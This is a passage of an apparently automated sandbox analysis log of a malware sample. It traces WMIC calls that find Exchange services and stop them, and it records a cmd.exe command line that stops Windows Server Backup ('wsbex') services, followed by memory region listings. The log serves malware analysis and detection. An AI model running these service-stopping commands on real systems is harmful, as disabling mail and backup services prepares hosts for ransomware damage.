wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.750] lstrlenW (lpString="StopService") returned 11 [0105.750] lstrlenW (lpString="STOPSERVICE") returned 11 [0105.750] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0105.750] GetCurrentThreadId () returned 0xcc8 [0105.751] ??0CHString@@QAE@XZ () returned 0x51ec84 [0105.751] IWbemClassObject:Get (in: This=0x637240, wszName="Description", lFlags=0, pVal=0x51ec54*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51ec54*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.751] ??1CHString@@QAE@XZ () returned 0x74a66430 [0105.751] IWbemClassObject:Get (in: This=0x637240, wszName="Parameters", lFlags=0, pVal=0x51edf8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51edf8*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.751] IWbemClassObject:Get (in: This=0x637240, wszName="VerbType", lFlags=0, pVal=0x51ed90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51ed90*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.751] IWbemClassObject:Get (in: This=0x637240, wszName="Derivation", lFlags=0, pVal=0x51ed78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51ed78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0105.751] lstrlenW (lpString="StopService") returned 11 [0105.751] lstrlenW (lpString="StopService") returned 11 [0105.751] IUnknown:Release (This=0x637240) returned 0x1 [0105.751] IUnknown:Release (This=0x635348) returned 0x0 [0105.752] ??1CHString@@QAE@XZ () returned 0x74a66430 [0105.752] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0105.752] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0105.752] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x715bad02 | out: _String="Select", _Context=0x715bad02) returned="Select" [0105.753] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x715bad02 | out: _String=0x0, _Context=0x715bad02) returned="*" [0105.753] lstrlenW (lpString="FROM") returned 4 [0105.753] lstrlenW (lpString="*") returned 1 [0105.753] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0105.753] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x715bad02 | out: _String=0x0, _Context=0x715bad02) returned="from" [0105.753] lstrlenW (lpString="FROM") returned 4 [0105.753] lstrlenW (lpString="from") returned 4 [0105.753] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0105.753] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x715bad02 | out: _String=0x0, _Context=0x715bad02) returned="Win32_Service" [0105.753] lstrlenW (lpString="SET") returned 3 [0105.753] lstrlenW (lpString="CALL") returned 4 [0105.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0105.754] lstrlenW (lpString="CREATE") returned 6 [0105.754] lstrlenW (lpString="CALL") returned 4 [0105.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0105.754] lstrlenW (lpString="GET") returned 3 [0105.754] lstrlenW (lpString="CALL") returned 4 [0105.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0105.754] lstrlenW (lpString="LIST") returned 4 [0105.754] lstrlenW (lpString="CALL") returned 4 [0105.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0105.754] lstrlenW (lpString="ASSOC") returned 5 [0105.754] lstrlenW (lpString="CALL") returned 4 [0105.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0105.754] WbemLocator:IUnknown:AddRef (This=0x5e0500) returned 0x3 [0105.754] lstrlenW (lpString="") returned 0 [0105.754] lstrlenW (lpString="LHNIWSJ") returned 7 [0105.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0105.754] lstrlenW (lpString="LHNIWSJ") returned 7 [0105.754] lstrlenW (lpString="LHNIWSJ") returned 7 [0105.754] GetCurrentThreadId () returned 0xcc8 [0105.754] GetCurrentProcess () returned 0xffffffff [0105.754] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x51f784 | out: TokenHandle=0x51f784*=0x270) returned 1 [0105.754] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x51f780 | out: TokenInformation=0x0, ReturnLength=0x51f780) returned 0 [0105.754] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x889b60, TokenInformationLength=0x118, ReturnLength=0x51f780 | out: TokenInformation=0x889b60, ReturnLength=0x51f780) returned 1 [0105.754] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0x889b60*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0105.754] CloseHandle (hObject=0x270) returned 1 [0105.754] lstrlenW (lpString="GET") returned 3 [0105.754] lstrlenW (lpString="CALL") returned 4 [0105.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0105.754] lstrlenW (lpString="LIST") returned 4 [0105.754] lstrlenW (lpString="CALL") returned 4 [0105.754] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0105.754] lstrlenW (lpString="SET") returned 3 [0105.754] lstrlenW (lpString="CALL") returned 4 [0105.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0105.755] lstrlenW (lpString="CALL") returned 4 [0105.755] lstrlenW (lpString="CALL") returned 4 [0105.755] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0105.755] ??0CHString@@QAE@XZ () returned 0x51f744 [0105.755] GetCurrentThreadId () returned 0xcc8 [0105.755] SysStringLen (param_1="\\\\") returned 0x2 [0105.755] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0105.755] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0105.755] SysStringLen (param_1="\\") returned 0x1 [0105.755] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0105.755] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0105.755] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5e0500, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0x610878) returned 0x0 [0105.761] CoSetProxyBlanket (pProxy=0x610878, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0105.762] ??1CHString@@QAE@XZ () returned 0x74a66430 [0105.762] ??0CHString@@QAE@XZ () returned 0x51f740 [0105.762] GetCurrentThreadId () returned 0xcc8 [0105.762] lstrlenA (lpString="") returned 0 [0105.762] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x889ae0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.762] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0105.762] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0105.762] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x715bacae | out: _String="Select", _Context=0x715bacae) returned="Select" [0105.762] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x715bacae | out: _String=0x0, _Context=0x715bacae) returned="*" [0105.762] lstrlenW (lpString="FROM") returned 4 [0105.762] lstrlenW (lpString="*") returned 1 [0105.762] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0105.762] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x715bacae | out: _String=0x0, _Context=0x715bacae) returned="from" [0105.762] lstrlenW (lpString="FROM") returned 4 [0105.762] lstrlenW (lpString="from") returned 4 [0105.762] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0105.762] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x715bacae | out: _String=0x0, _Context=0x715bacae) returned="Win32_Service" [0105.763] IWbemServices:GetObject (in: This=0x610878, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x51f718*=0x0, ppCallResult=0x0 | out: ppObject=0x51f718*=0x635af8, ppCallResult=0x0) returned 0x0 [0105.797] IWbemClassObject:GetMethod (in: This=0x635af8, wszName="STOPSERVICE", lFlags=0, ppInSignature=0x51f724, ppOutSignature=0x51f710 | out: ppInSignature=0x51f724*=0x0, ppOutSignature=0x51f710*=0x635e78) returned 0x0 [0105.797] IUnknown:Release (This=0x635e78) returned 0x0 [0105.797] IUnknown:Release (This=0x635af8) returned 0x0 [0105.797] ??0CHString@@QAE@XZ () returned 0x51f5f0 [0105.797] GetCurrentThreadId () returned 0xcc8 [0105.797] lstrlenA (lpString="") returned 0 [0105.797] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x889ae0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.797] lstrlenA (lpString="") returned 0 [0105.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0x889ae0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0105.798] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0105.798] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0105.798] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x715baf26 | out: _String="Select", _Context=0x715baf26) returned="Select" [0105.798] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x715baf26 | out: _String=0x0, _Context=0x715baf26) returned="*" [0105.798] lstrlenW (lpString="FROM") returned 4 [0105.798] lstrlenW (lpString="*") returned 1 [0105.798] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0105.798] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x715baf26 | out: _String=0x0, _Context=0x715baf26) returned="from" [0105.798] lstrlenW (lpString="FROM") returned 4 [0105.798] lstrlenW (lpString="from") returned 4 [0105.798] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0105.798] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x715baf26 | out: _String=0x0, _Context=0x715baf26) returned="Win32_Service" [0105.798] lstrlenA (lpString="SELECT * FROM ") returned 14 [0105.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0x889fa8, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0105.798] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0105.798] SysStringLen (param_1="Win32_Service") returned 0xd [0105.798] lstrlenA (lpString=" WHERE ") returned 7 [0105.798] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0x889e18, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0105.798] SysStringLen (param_1=" WHERE ") returned 0x7 [0105.798] SysStringLen (param_1="caption LIKE '%Exchange%'") returned 0x19 [0105.798] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0105.798] SysStringLen (param_1=" WHERE caption LIKE '%Exchange%'") returned 0x20 [0105.799] IWbemServices:ExecQuery (in: This=0x610878, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%Exchange%'", lFlags=48, pCtx=0x0, ppEnum=0x51f5f8 | out: ppEnum=0x51f5f8*=0x635ea0) returned 0x0 [0105.805] CoSetProxyBlanket (pProxy=0x635ea0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0105.807] IEnumWbemClassObject:Next (in: This=0x635ea0, lTimeout=-1, uCount=0x1, apObjects=0x51f5fc, puReturned=0x51f5e8 | out: apObjects=0x51f5fc*=0x63a1f0, puReturned=0x51f5e8*=0x1) returned 0x0 [0106.225] IWbemClassObject:Get (in: This=0x63a1f0, wszName="__PATH", lFlags=0, pVal=0x51f5c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x51f5c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\LHNIWSJ\\ROOT\\CIMV2:Win32_Service.Name=\"vmickvpexchange\"", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0106.225] ??0CHString@@QAE@XZ () returned 0x51f56c [0106.225] GetCurrentThreadId () returned 0xcc8 [0106.225] LoadStringW (in: hInstance=0x0, uID=0xb7ea, lpBuffer=0x51e51c, cchBufferMax=1024 | out: lpBuffer="Executing (%1)->%2()\r\n") returned 0x16 [0106.225] FormatMessageW (in: dwFlags=0x2500, lpSource=0x51e51c, dwMessageId=0x0, dwLanguageId=0x400, lpBuffer=0x51e504, nSize=0x0, Arguments=0x51e508 | out: lpBuffer="ꎈc哤c⎘\x88꫎眊") returned 0x56 [0106.225] LocalFree (hMem=0x63a388) returned 0x0 [0106.225] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Executing (\\\\LHNIWSJ\\ROOT\\CIMV2:Win32_Service.Name=\"vmickvpexchange\")->STOPSERVICE()\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 87 [0106.225] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Executing (\\\\LHNIWSJ\\ROOT\\CIMV2:Win32_Service.Name=\"vmickvpexchange\")->STOPSERVICE()\r\n", cchWideChar=-1, lpMultiByteStr=0x889fa8, cbMultiByte=87, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Executing (\\\\LHNIWSJ\\ROOT\\CIMV2:Win32_Service.Name=\"vmickvpexchange\")->STOPSERVICE()\r\n", lpUsedDefaultChar=0x0) returned 87 [0106.225] ??YCHString@@QAEABV0@PBG@Z () returned 0x13495ec [0106.225] __iob_func () returned 0x77ac1208 [0106.225] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 86 [0106.234] __iob_func () returned 0x77ac1208 [0106.234] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0106.234] IWbemServices:ExecMethod (in: This=0x610878, strObjectPath="\\\\LHNIWSJ\\ROOT\\CIMV2:Win32_Service.Name=\"vmickvpexchange\"", strMethodName="STOPSERVICE", lFlags=0, pCtx=0x0, pInParams=0x0, ppOutParams=0x51f57c*=0x0, ppCallResult=0x0 | out: ppOutParams=0x51f57c*=0x63a670, ppCallResult=0x0) returned 0x0 [0106.420] LoadStringW (in: hInstance=0x0, uID=0xb3b3, lpBuffer=0x88b0d8, cchBufferMax=1024 | out: lpBuffer="Method execution successful.\r\n") returned 0x1e [0106.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Method execution successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0106.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Method execution successful.\r\n", cchWideChar=-1, lpMultiByteStr=0x889fa8, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Method execution successful.\r\n", lpUsedDefaultChar=0x0) returned 31 [0106.420] ??YCHString@@QAEABV0@PBG@Z () returned 0x13495ec [0106.420] __iob_func () returned 0x77ac1208 [0106.420] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 30 [0106.421] __iob_func () returned 0x77ac1208 [0106.421] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0106.421] IUnknown:AddRef (This=0x63a670) returned 0x2 [0106.421] ??0CHString@@QAE@XZ () returned 0x51ed10 [0106.421] GetCurrentThreadId () returned 0xcc8 [0106.435] IWbemClassObject:GetObjectText (in: This=0x63a670, lFlags=0, pstrObjectText=0x51ed18 | out: pstrObjectText=0x51ed18*="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 5;\n};\n") returned 0x0 [0106.436] LoadStringW (in: hInstance=0x0, uID=0xb7f7, lpBuffer=0x88b0d8, cchBufferMax=1024 | out: lpBuffer="Out Parameters:") returned 0xf [0106.436] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Out Parameters:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0106.436] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Out Parameters:", cchWideChar=-1, lpMultiByteStr=0x889d10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Out Parameters:", lpUsedDefaultChar=0x0) returned 16 [0106.436] ??YCHString@@QAEABV0@PBG@Z () returned 0x13495ec [0106.436] __iob_func () returned 0x77ac1208 [0106.436] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 15 [0106.442] __iob_func () returned 0x77ac1208 [0106.442] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0106.442] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 5;\n};\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0106.442] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 5;\n};\n", cchWideChar=-1, lpMultiByteStr=0x88b0d8, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\ninstance of __PARAMETERS\n{\n\x09ReturnValue = 5;\n};\n", lpUsedDefaultChar=0x0) returned 50 [0106.442] ??YCHString@@QAEABV0@PBG@Z () returned 0x13495ec [0106.442] __iob_func () returned 0x77ac1208 [0106.442] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 49 [0106.442] __iob_func () returned 0x77ac1208 [0106.442] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0106.442] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0106.442] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=-1, lpMultiByteStr=0x889ae0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 2 [0106.442] ??YCHString@@QAEABV0@PBG@Z () returned 0x13495ec [0106.442] __iob_func () returned 0x77ac1208 [0106.442] fprintf (in: _File=0x77ac1248, _Format="%s" | out: _File=0x77ac1248) returned 1 [0106.443] __iob_func () returned 0x77ac1208 [0106.443] fflush (in: _File=0x77ac1248 | out: _File=0x77ac1248) returned 0 [0106.443] ??1CHString@@QAE@XZ () returned 0x74a66430 [0106.443] IUnknown:Release (This=0x63a670) returned 0x1 [0106.443] ??1CHString@@QAE@XZ () returned 0x74a66430 [0106.443] IUnknown:Release (This=0x63a1f0) returned 0x0 [0106.444] IEnumWbemClassObject:Next (in: This=0x635ea0, lTimeout=-1, uCount=0x1, apObjects=0x51f5fc, puReturned=0x51f5e8 | out: apObjects=0x51f5fc*=0x0, puReturned=0x51f5e8*=0x0) returned 0x1 [0106.445] IUnknown:Release (This=0x635ea0) returned 0x0 [0106.447] ??1CHString@@QAE@XZ () returned 0x74a66430 [0106.447] ??1CHString@@QAE@XZ () returned 0x74a66430 [0106.447] GetCurrentThreadId () returned 0xcc8 [0106.447] ??0CHString@@QAE@PBG@Z () returned 0x51f7b4 [0106.447] ??YCHString@@QAEABV0@PBG@Z () returned 0x51f7b4 [0106.447] lstrlenW (lpString="LIST") returned 4 [0106.447] lstrlenW (lpString="CALL") returned 4 [0106.447] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0106.447] lstrlenW (lpString="ASSOC") returned 5 [0106.447] lstrlenW (lpString="CALL") returned 4 [0106.447] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0106.447] lstrlenW (lpString="GET") returned 3 [0106.447] lstrlenW (lpString="CALL") returned 4 [0106.447] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0106.447] ??1CHString@@QAE@XZ () returned 0x1 [0106.447] IUnknown:Release (This=0x610878) returned 0x0 [0106.447] ?Empty@CHString@@QAEXXZ () returned 0x74a66430 [0106.447] _kbhit () returned 0x0 [0106.448] IUnknown:Release (This=0x63a670) returned 0x0 [0106.448] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0106.449] WbemLocator:IUnknown:Release (This=0x5e0500) returned 0x2 [0106.449] IUnknown:Release (This=0x610be8) returned 0x0 [0106.449] IUnknown:Release (This=0x610828) returned 0x0 [0106.449] WbemLocator:IUnknown:Release (This=0x5e0500) returned 0x1 [0106.449] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0106.449] WbemLocator:IUnknown:Release (This=0x5e0500) returned 0x0 [0106.450] CoUninitialize () [0106.469] exit (_Code=0) [0106.469] ??1CHString@@QAE@XZ () returned 0x74a66430 [0106.469] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 158 os_tid = 0xccc Thread: id = 160 os_tid = 0xcd0 Thread: id = 161 os_tid = 0xcd4 Thread: id = 162 os_tid = 0xcd8 Process: id = "31" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x44eec000" os_pid = "0xd10" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%wsbex%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2083 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2084 start_va = 0xfb0000 end_va = 0x4faffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fb0000" filename = "" Region: id = 2085 start_va = 0x4fb0000 end_va = 0x4fcffff entry_point = 0x0 region_type = private name = "private_0x0000000004fb0000" filename = "" Region: id = 2086 start_va = 0x4fd0000 end_va = 0x4fd1fff entry_point = 0x0 region_type = private name = "private_0x0000000004fd0000" filename = "" Region: id = 2087 start_va = 0x4fe0000 end_va = 0x4ff3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004fe0000" filename = "" Region: id = 2088 start_va = 0x5000000 end_va = 0x503ffff entry_point = 0x0 region_type = private name = "private_0x0000000005000000" filename = "" Region: id = 2089 start_va = 0x5040000 end_va = 0x513ffff entry_point = 0x0 region_type = private name = "private_0x0000000005040000" filename = "" Region: id = 2090 start_va = 0x5140000 end_va = 0x5143fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005140000" filename = "" Region: id = 2091 start_va = 0x5150000 end_va = 0x5150fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005150000" filename = "" Region: id = 2092 start_va = 0x5160000 end_va = 0x5161fff entry_point = 0x0 region_type = private name = "private_0x0000000005160000" filename = "" Region: id = 2093 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2094 start_va = 0x7f4c0000 end_va = 0x7f4e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f4c0000" filename = "" Region: id = 2095 start_va = 0x7f4e9000 end_va = 0x7f4e9fff entry_point = 0x0 region_type = private name = "private_0x000000007f4e9000" filename = "" Region: id = 2096 start_va = 0x7f4ec000 end_va = 